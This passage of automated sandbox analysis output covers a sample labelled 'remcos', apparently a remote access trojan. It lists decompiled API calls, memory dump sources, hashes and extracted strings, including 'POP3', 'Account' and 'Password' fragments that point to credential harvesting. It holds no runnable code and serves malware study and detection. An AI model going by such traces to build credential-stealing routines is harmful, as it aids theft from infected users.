                                                                                                                                                                                      • Part of subcall function 2DE95AF6: _abort.LIBCMT ref: 2DE95B74
                                                                                                                                                                                      • Part of subcall function 2DE96D7E: _abort.LIBCMT ref: 2DE96DB0
                                                                                                                                                                                      • Part of subcall function 2DE96D7E: _free.LIBCMT ref: 2DE96DE4
                                                                                                                                                                                      • Part of subcall function 2DE969F3: GetOEMCP.KERNEL32(00000000,?,?,2DE96C7C,?), ref: 2DE96A1E
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE96CD7
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE96D0D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorLast_abort
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2991157371-0
                                                                                                                                                                                    • Opcode ID: 3281961d132be10e5be187fc8e83bb9a06c9acbe83bf1ed5b891e5f7008f498e
                                                                                                                                                                                    • Instruction ID: 13a8d136bf658bb2657b513ebee5c8ccffdf55b4f4f665fcef23bbf7b1c7ac59
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3281961d132be10e5be187fc8e83bb9a06c9acbe83bf1ed5b891e5f7008f498e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1931B0B19092C8AFD701EBA9C540BD9BBF1EF40324F22419EE914BB291EF759E41CB50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 2DE9736B
                                                                                                                                                                                    • GetFileType.KERNEL32(00000000), ref: 2DE9737D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileHandleType
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3000768030-0
                                                                                                                                                                                    • Opcode ID: e4b4a36b1e1ec984d519bfa840d7198032051a9ff59a9dfa69cb68e06f86a701
                                                                                                                                                                                    • Instruction ID: 887f19baebd3239aecfce93c4c4459329b74eb99bc32df47a66d60cb4b1e643a
                                                                                                                                                                                    • Opcode Fuzzy Hash: e4b4a36b1e1ec984d519bfa840d7198032051a9ff59a9dfa69cb68e06f86a701
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B11DD3110575286C723DE3D8C86AE6BAD5B786174B340F29DDB6F66E1CB34D5898240
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,2DE95E85,00000006,FlsSetValue,2DE9E190,FlsSetValue,00000000,00000364,?,2DE95BC8,00000000), ref: 2DE95CA5
                                                                                                                                                                                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 2DE95CB2
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2279764990-0
                                                                                                                                                                                    • Opcode ID: 2cb133467a77b02ea5d0e677f604f2f06840d2b995006cfecfe570fa6499508f
                                                                                                                                                                                    • Instruction ID: 27f011dcac2102cba80203df1d5f23ab0253401a2b57e4d9e908f60b10f74b79
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cb133467a77b02ea5d0e677f604f2f06840d2b995006cfecfe570fa6499508f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6611EC33A026319FDB129E58D990ADA73F6AB80664B164260FE55FB344DF30EC0386D5
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 2DE97153: GetEnvironmentStringsW.KERNEL32 ref: 2DE9715C
                                                                                                                                                                                      • Part of subcall function 2DE97153: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2DE9717F
                                                                                                                                                                                      • Part of subcall function 2DE97153: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 2DE971A5
                                                                                                                                                                                      • Part of subcall function 2DE97153: _free.LIBCMT ref: 2DE971B8
                                                                                                                                                                                      • Part of subcall function 2DE97153: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 2DE971C7
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE94F1D
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE94F24
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 400815659-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • dllmain_crt_process_attach.LIBCMT ref: 2DE91F22
                                                                                                                                                                                    • dllmain_crt_process_detach.LIBCMT ref: 2DE91F35
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3750050125-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 2DE93AF1: try_get_function.LIBVCRUNTIME ref: 2DE93B06
                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 2DE93906
                                                                                                                                                                                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 2DE93911
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 806969131-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VariantCopy.OLEAUT32 ref: 0333E742
                                                                                                                                                                                      • Part of subcall function 0333E320: VariantClear.OLEAUT32 ref: 0333E334
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.846066599.0000000003331000.00000020.00001000.00020000.00000000.sdmp, Offset: 03331000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_3331000_remcos.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Variant$ClearCopy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 274517740-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 03346D28: CLSIDFromProgID.OLE32 ref: 03346D5A
                                                                                                                                                                                    • CoCreateInstance.OLE32 ref: 03346DD8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.846066599.0000000003331000.00000020.00001000.00020000.00000000.sdmp, Offset: 03331000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_3331000_remcos.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFromInstanceProg
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2151042543-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.846066599.0000000003331000.00000020.00001000.00020000.00000000.sdmp, Offset: 03331000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_3331000_remcos.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 2DE963BC
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.846066599.0000000003331000.00000020.00001000.00020000.00000000.sdmp, Offset: 03331000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_3331000_remcos.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FromProg
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3303861117-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 2DE91CCA: CopyFileW.KERNEL32(?,?,00000000), ref: 2DE91D1B
                                                                                                                                                                                      • Part of subcall function 2DE91CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 2DE91D37
                                                                                                                                                                                      • Part of subcall function 2DE91CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 2DE91D4B
                                                                                                                                                                                    • _strlen.LIBCMT ref: 2DE91855
                                                                                                                                                                                    • _strlen.LIBCMT ref: 2DE91869
                                                                                                                                                                                    • _strlen.LIBCMT ref: 2DE9188B
                                                                                                                                                                                    • _strlen.LIBCMT ref: 2DE918AE
                                                                                                                                                                                    • _strlen.LIBCMT ref: 2DE918C8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strlen$File$CopyCreateDelete
                                                                                                                                                                                    • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                                                                    • API String ID: 3296212668-3023110444
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strlen
                                                                                                                                                                                    • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                                                                    • API String ID: 4218353326-230879103
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 2DE97D06
                                                                                                                                                                                      • Part of subcall function 2DE990BA: _free.LIBCMT ref: 2DE990D7
                                                                                                                                                                                      • Part of subcall function 2DE990BA: _free.LIBCMT ref: 2DE990E9
                                                                                                                                                                                      • Part of subcall function 2DE990BA: _free.LIBCMT ref: 2DE990FB
                                                                                                                                                                                      • Part of subcall function 2DE990BA: _free.LIBCMT ref: 2DE9910D
                                                                                                                                                                                      • Part of subcall function 2DE990BA: _free.LIBCMT ref: 2DE9911F
                                                                                                                                                                                      • Part of subcall function 2DE990BA: _free.LIBCMT ref: 2DE99131
                                                                                                                                                                                      • Part of subcall function 2DE990BA: _free.LIBCMT ref: 2DE99143
                                                                                                                                                                                      • Part of subcall function 2DE990BA: _free.LIBCMT ref: 2DE99155
                                                                                                                                                                                      • Part of subcall function 2DE990BA: _free.LIBCMT ref: 2DE99167
                                                                                                                                                                                      • Part of subcall function 2DE990BA: _free.LIBCMT ref: 2DE99179
                                                                                                                                                                                      • Part of subcall function 2DE990BA: _free.LIBCMT ref: 2DE9918B
                                                                                                                                                                                      • Part of subcall function 2DE990BA: _free.LIBCMT ref: 2DE9919D
                                                                                                                                                                                      • Part of subcall function 2DE990BA: _free.LIBCMT ref: 2DE991AF
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE97CFB
                                                                                                                                                                                      • Part of subcall function 2DE9571E: HeapFree.KERNEL32(00000000,00000000), ref: 2DE95734
                                                                                                                                                                                      • Part of subcall function 2DE9571E: GetLastError.KERNEL32(?,?,2DE9924F,?,00000000,?,00000000,?,2DE99276,?,00000007,?,?,2DE97E5A,?,?), ref: 2DE95746
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE97D1D
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE97D32
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE97D3D
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE97D5F
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE97D72
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE97D80
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE97D8B
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE97DC3
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE97DCA
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE97DE7
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE97DFF
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE959EA
                                                                                                                                                                                      • Part of subcall function 2DE9571E: HeapFree.KERNEL32(00000000,00000000), ref: 2DE95734
                                                                                                                                                                                      • Part of subcall function 2DE9571E: GetLastError.KERNEL32(?,?,2DE9924F,?,00000000,?,00000000,?,2DE99276,?,00000007,?,?,2DE97E5A,?,?), ref: 2DE95746
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE959F6
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95A01
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95A0C
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95A17
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95A22
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95A2D
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95A38
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95A43
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE95A51
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DecodePointer
                                                                                                                                                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                    • API String ID: 3527080286-3064271455
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 2DE91D1B
                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 2DE91D37
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 2DE91D4B
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 2DE91D58
                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 2DE91D72
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 2DE91D7D
                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 2DE91D8A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1454806937-0
                                                                                                                                                                                    • Opcode ID: d28ee4da656b645b80f9473e249449b013ec97549b77f7daa5b718e7bd64bc74
                                                                                                                                                                                    • Instruction ID: ddff71f0b4f7f33ca8d0b7b674e25a40f026fa00292a2160c244e587a4f78f1f
                                                                                                                                                                                    • Opcode Fuzzy Hash: d28ee4da656b645b80f9473e249449b013ec97549b77f7daa5b718e7bd64bc74
                                                                                                                                                                                    • Instruction Fuzzy Hash: FB212CB294222CAFDB119BA08C8CFEE76FCEB18755F010566F612E2240DA749E458A74
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetConsoleCP.KERNEL32 ref: 2DE994D4
                                                                                                                                                                                    • __fassign.LIBCMT ref: 2DE9954F
                                                                                                                                                                                    • __fassign.LIBCMT ref: 2DE9956A
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 2DE99590
                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,2DE99C07,00000000), ref: 2DE995AF
                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,2DE99C07,00000000), ref: 2DE995E8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                                    • Opcode ID: 407ddc1a9133931e4bdf8536315f4cf8e46064fd7f18d5e606d32cf9203adee0
                                                                                                                                                                                    • Instruction ID: 5d13a661c73cd06babf98365168d2816ccd8af164d26289c1b93eabd2e82133d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 407ddc1a9133931e4bdf8536315f4cf8e46064fd7f18d5e606d32cf9203adee0
                                                                                                                                                                                    • Instruction Fuzzy Hash: F651A271901209AFCB00CFA4CC95BEEBBF9FF19710F14515AE955F7282DA30A941CBA0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 2DE9339B
                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 2DE933A3
                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 2DE93431
                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 2DE9345C
                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 2DE934B1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_2de90000_remcos.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                    • Opcode ID: e411eb355a93a71277c8441535c4eec0f2e6bb9bcbc772d36b1ae389e15711c8
                                                                                                                                                                                    • Instruction ID: 3654599102ba48f11f9dc4e365c59744aa43f3b4619cfbe91d77d5ba61111f83
                                                                                                                                                                                    • Opcode Fuzzy Hash: e411eb355a93a71277c8441535c4eec0f2e6bb9bcbc772d36b1ae389e15711c8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7141E734A06218ABCF01CF68C884AEEBBF5FF45228F118155EA55BB352DF35DA11CB90
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 2DE99221: _free.LIBCMT ref: 2DE9924A
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE992AB
                                                                                                                                                                                      • Part of subcall function 2DE9571E: HeapFree.KERNEL32(00000000,00000000), ref: 2DE95734
                                                                                                                                                                                      • Part of subcall function 2DE9571E: GetLastError.KERNEL32(?,?,2DE9924F,?,00000000,?,00000000,?,2DE99276,?,00000007,?,?,2DE97E5A,?,?), ref: 2DE95746
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE992B6
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE992C1
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE99315
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE99320
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE9932B
                                                                                                                                                                                    • _free.LIBCMT ref: 2DE99336
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.850590087.000000002DE91000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DE90000, based on PE: true
                                                                                                                                                                                    • Associated: 00000009.00000002.850583505.000000002DE90000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000009.00000002.850590087.000000002DEA6000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
